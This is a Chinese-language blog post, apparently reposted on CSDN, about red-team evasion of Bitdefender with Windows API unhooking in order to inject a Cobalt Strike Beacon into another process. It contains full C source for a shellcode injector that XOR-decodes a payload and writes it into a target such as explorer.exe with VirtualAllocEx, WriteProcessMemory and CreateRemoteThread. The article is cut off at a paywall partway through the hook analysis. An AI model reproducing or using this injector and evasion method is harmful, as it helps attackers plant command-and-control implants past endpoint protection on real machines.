openprocess打开进程失败_利用API unhooking完成进程注入,成功绕过Bitdefender检测

最新推荐文章于 2024-05-09 16:38:31 发布
最新推荐文章于 2024-05-09 16:38:31 发布
阅读量587 收藏 1
点赞数
文章标签: openprocess打开进程失败 vc++ hook 拦截自己进程指定的api函数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39531780/article/details/111284613
版权

56954054f5b29fe46f09c1c7c0647568.gif

绕过端点防护软件(如AV/EDR)是红队行动中的一项重要工作,但是在完成这项工作之前,我们可能需要一些时间来了解这些防护软件是如何工作的。而随着网上发布了大量关于这个主题的资源,了解这些产品的工作原理以及如何绕过它们也变得更加容易。在这篇文章中,我将向大家展示如何利用windows API unhooking技术来绕过BitDefender全功能安全套装的。在此过程中,我们将为读者介绍关于API unhooking的概念,以及如何利用这种技术来绕过安全防护软件。

我们的主要目标是,在启动了BitDefender全功能安全套装的机器上,通过进程注入以获得一个“活蹦乱跳”的Cobalt Strike Beacon。

8d755a0f936ed94805d351ef6a09c42a.png

什么是API Hooking?

API hooking是一种用于拦截和检查win32 API调用的方法,这种技术被AV/EDR用来监视win32 API调用,并判断这些调用是否合法。所以简单来说,AV/EDR会通过在一个由解决方案本身控制的自定义模块中添加一个JMP指令来改变普通API调用的执行流程,该模块会扫描API调用及其参数,并检查它们是否合法。

这篇由Spotless撰写的文章解释了API hooking的工作原理,感兴趣的读者可以通过它来了解该技术的详细信息。

8d755a0f936ed94805d351ef6a09c42a.png

尝试通过进程注入实现免杀

在之前的文章中,我介绍了如何先对shellcode进行编码,然后再在内存中进行解码,以实现免杀。下面,让我们再尝试一下这种技术,看看它针对BitDefender全功能安全套装是否有效。

像在上一篇文章中一样,用于对shellcode进行编码的代码并没有发生变化,具体如下所示:

#include

// This code was written for researching purpose, you have to edit it before using it in real-world

// This code will deocde your shellcode and write it directly to the memory

int main(int argc, char* argv[]) {

// Our Shellcode

unsigned char shellcode[] = "MyEncodedshellcode";

// Check arguments counter

if(argc != 2){

    printf("[+] Usage : decoder.exe [PID]\n");

    exit(0);

}

// The process id we want to inject our code to passed to the executable

// Use GetCurrentProcessId() to inject the shellcode into original process

int process_id = atoi(argv[1]);

// Define the base_address variable which will save the allocated memory address

LPVOID base_address;

// Retrive the process handle using OpenProcess

HANDLE process = OpenProcess(PROCESS_ALL_ACCESS, 0, process_id);

    if (process) {

        printf("[+] Handle retrieved successfully!\n");

        printf("[+] Handle value is %p\n", process);

        base_address = VirtualAllocEx(process, NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

        if (base_address) {

            printf("[+] Allocated based address is 0x%x\n", base_address);

                // Data chars counter

                int i;

                // Base address counter

                int n = 0;

                for(i = 0; i<=sizeof(shellcode); i++){

                    // Decode shellcode opcode (you can edit it based on your encoder settings)

                    char DecodedOpCode = shellcode[i] ^ 0x01;

                    // Write the decoded bytes in memory address

                    if(WriteProcessMemory(process, base_address+n, &DecodedOpCode, 1, NULL)){

            // Write the memory address where the data was written

                        printf("[+] Byte 0x%X wrote sucessfully! at 0x%X\n", DecodedOpCode, base_address + n);

                        // Increase memory address by 1

                        n++;

                    }

                }

                // Run our code as RemoteThread

                CreateRemoteThread(process, NULL, 100,(LPTHREAD_START_ROUTINE)base_address, NULL, NULL, 0x50002);

        }

        else {

            printf("[+] Unable to allocate memory ..\n");

        }

    }

    else {

        printf("[-] Enable to retrieve process handle\n");

    }

}

当我编译文件并运行它来注入explorer.exe的shellcode后,我得到了以下结果:

c85449ad024b8cf9df10cfefa4f469df.png

BitDefender检测到该文件的执行情况并进行了拦截

我们可以看到,上述代码执行时被BitDefender检测到并被拦截,同时,“injector.exe”也被删除了。

那么,到底发生了什么,为什么上述代码在执行时会被拦截呢?

8d755a0f936ed94805d351ef6a09c42a.png

检测hooking

在重新编译可执行文件后,我开始进行调试,看看有没有外部DLL被注入到可执行文件中,结果如下所示:

05e775afa47a74ca661e4a97bb06c94b.png

注入的定制模块

我的可执行文件中加载了一个名为atcuf64.dll的文件,并且这个文件与BitDefender有关!

于是,我开始调试在shellcode注入过程中调用的主要win32API,当然,我从最可疑的 "CreateRemoteThread "开始调试的,反汇编结果如下所示:

ed48439d439ac56e3df20fd0cfc319b3.png

CreateRemoteThread的反汇编代码

这里没有什么可疑的地方,但是,从执行流程中我们可以看到,我们将使用CreateRemoteThreadEx API,所以,我对其进行反汇编,结果如下所示:

最低0.47元/天 解锁文章
weixin_39531780
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ApiHook.rar_APIHOOK_OpenProcess_delphi Openprocess_delphi 拦截api_
09-24
总之,"ApiHook.rar_APIHOOK_OpenProcess_delphi"提供的资源可能包含了一个使用Delphi编写的示例,演示了如何拦截`OpenProcess`和`TerminateProcess`,以达到保护进程的目的。这个例子对于学习API Hook技术,以及...
APIHOOK.rar_APIHOOK_Process_hook api_hook api basic_进程保护
09-19
标签“apihook”、“process hook_api”、“hook_api_basic”和“进程保护”进一步强调了API Hook进程级别的应用。基本的API Hook技术通常包括以下几个步骤: 1. **选择要钩住的API**:根据需求,确定需要监控或...
过TP保护之发现DNF进程(上)
HeiXiaoWu的专栏
08-25 3679
最近关于游戏保护的话题又热了起来,而之前一段时间,本菜鸟也研究了过TP的方法,现将这些总结出来,给新手看看,高手绕过吧。 本人调试环境: WINXP+VirtualBOX+WinDbg+VS2010 (一)难觅踪迹 启动DNF: 任务管理器: 可以发现,是运行了的。 OD附加进程 是找不到DNF.exe这个进程的 换XT看看是怎么回事
Windows API一日一练(89)OpenProcess函数
anjichan4261的博客
12-13 376
这一年来流氓软件特别多,面对这种非常恶心的软件,让大家非常痛苦。正是在这种环境之下,众多客户需要强大查杀这种流氓软件的工具。如果让你来开发一个查杀这种病毒的软件,你会怎么做呢?当然是先把电脑里所有进程遍历出来,然后把每个进程的详细信息显示给用户,让用户决定自己那些进程可以运行,那些不可以运行。或者根据当前进程的信息,再跟根据病毒库里的特征码进行比较,就可以标识那些是可疑的病毒了。下面就来...
网络安全最全Cobalt Strike使用教程一_cobaltstrike,2024年最新大厂面试必备技能
最新发布
2301_77033672的博客
05-09 537
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
OpenProcess()函数
热门推荐
夜空中最亮的星
10-06 5万+
通过一个进程关闭另外一个进程的时候,一般的做法就是枚举系统打开的所用进程的标识符(PID),使用OpenProcess函数获得进程的句柄,该函数可以通过第一个参数来设置句柄的新的访问权限(不清楚句柄是不是和原来的一模一样?有待证明和学习),比如如果打开的句柄不具备终止句柄的权限,直线终止进程操作会失败,返回的错误代码为5(意思为拒绝访问)。通过获得的句柄就可以获得进程名字(通过GetModuleB
OpenProcess讲解
xbgprogrammer的专栏
10-23 7156
HANDLE hProcess=OpenProcess(PROCESS_TERMINATE|SYNCHRONIZE,FALSE,proid); if (hProcess==NULL) { cout<<"OpenProcess failed with "<<GetLastError()<<endl; return 0; } else { TCHAR buffer[MAX_PAT
windowsAPI OpenProcess和CreateProcess的区别
Catch me if you can
05-02 2996
API了解的多了,很容易混乱,在调试一节中,提到打开进程和创建进程。 从名字上来说,创建进程,就是创建了一个新的进程,而打开进程,是为了获取已经运行了的进程的句柄。MSDN解释,说的很清楚OpenProcessfunction: Opens an existing local process object. return: If the function succeeds, the return
WindowAPI 详解--OpenProcess打开获得进程句柄
03-24 1万+
WindowsAPI详解——OpenProcess 打开|获得进程句柄 - [VC++编程] 版权声明:转载时请以超链接形式标明文章原始出处和作者信息及本声明 http://www.blogbus.com/flyxxtt-logs/43752726.html       在获得进程可执行文件路径的几种方法中曾使用了OpenProcess来获得进程的句柄,今天就详细介绍下这个函
过NtOpenProcess保护的方法总结
xrain_zh的专栏
05-03 2053
来自:http://blog.csdn.net/jepco1/article/details/5531449 过NtOpenProcess保护的方法总结,搜集了一下网上的方案,自己整理了一下。 一般的保护程序喜欢在NtOpenProcess中设置inline hook,修改返回句柄。调试程序使用该程序附加附加到被保护进程的时候,就得不到正确的进程访问句柄,因而附加失败。 反此类保
enum_moudle.rar_API_vb 进程_visual basic_进程模块_遍历 窗体
09-14
本示例"enum_moudle.rar_API_vb 进程_visual basic_进程模块_遍历 窗体"旨在教授如何使用API函数遍历系统中的进程、模块以及窗体。下面将详细介绍涉及的知识点。 1. **API调用**: - VB中调用API函数主要通过`...
paraent.rar_delphi 进程_反检测源码_父进程
09-20
例如,`OpenProcess`函数可以打开一个已存在的进程,`GetProcessId`函数可以获取进程的PID,而`EnumProcesses`函数则可以枚举系统中的所有进程。要检测一个进程是否为另一个进程的父进程,我们需要比较它们的PID,并...
API-Hook-Open-Process.rar_HOOK openprocess_Process_hook api_hook
09-20
`OpenProcess`是Windows API中一个重要的函数,允许一个进程获取对另一个进程的访问权限,从而可以读取、写入或控制被打开进程API Hook的基本原理是拦截调用特定API函数的请求,然后在实际调用之前或之后执行...
【转】好文推荐,API unhooking技术
prettyX的博客
09-10 115
利用API unhooking完成进程注入成功绕过Bitdefender检测 - 嘶吼 RoarTalk – 回归最本质的信息安全,互联网安全新媒体,4hou.com
怎么知道自己是否有权限用openProcess打开一个进程
02-08
你可以使用以下方法来确定自己是否有权限使用 openProcess 打开一个...3. 尝试使用 openProcess 打开进程,如果成功,则表示你有权限。如果失败,则可以使用 GetLastError 方法获取错误代码,并根据错误代码确定原因。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值